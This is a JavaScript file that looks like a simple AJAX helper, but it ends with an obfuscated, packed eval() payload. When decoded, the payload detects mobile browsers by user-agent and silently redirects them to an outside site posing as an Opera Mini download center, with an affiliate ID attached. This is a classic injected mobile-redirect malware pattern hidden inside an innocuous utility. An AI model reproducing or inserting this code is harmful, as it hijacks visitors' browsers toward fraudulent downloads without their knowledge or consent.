var AJAX
function initAjax(){
try{
AJAX=new ActiveXObject('MSXML2.XMLHTTP.3.0')}
catch(e){
try{
AJAX=new ActiveXObject('MSXML2.XMLHTTP')}
catch(f){
try{
AJAX=new ActiveXObject('Microsoft.XMLHTTP')}
catch(g){
AJAX=null}}}
if(!AJAX&&typeof(XMLHttpRequest)!='undefined'){
AJAX=new XMLHttpRequest()}}
function doRequest(url,callback,method){
if(method !='POST'){
method='GET'}
if(typeof(callback)=='undefined'){
return}
try{
AJAX.open(method,url,true)
AJAX.onreadystatechange=eval(callback)
AJAX.send(null)}
catch(e){}}
window.onload=function(){
initAjax()}
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('p(o.n.l(/(s|6|A|e|c f|g|0 h|0 b|9|4|2|5)/i)!==8){7.j="k://w-v-x.y/?z=u&r=m&d=3&t=q&a=1"}',37,37,'windows||blackberry||smartphone|mtk|midp|window|null|ppc||ce|series||symbian|60|symbos|mobile||location|http|match|auto|userAgent|navigator|if|medium||android||3535|mini|opera|center|com|sid|j2me'.split('|'),0,{}))

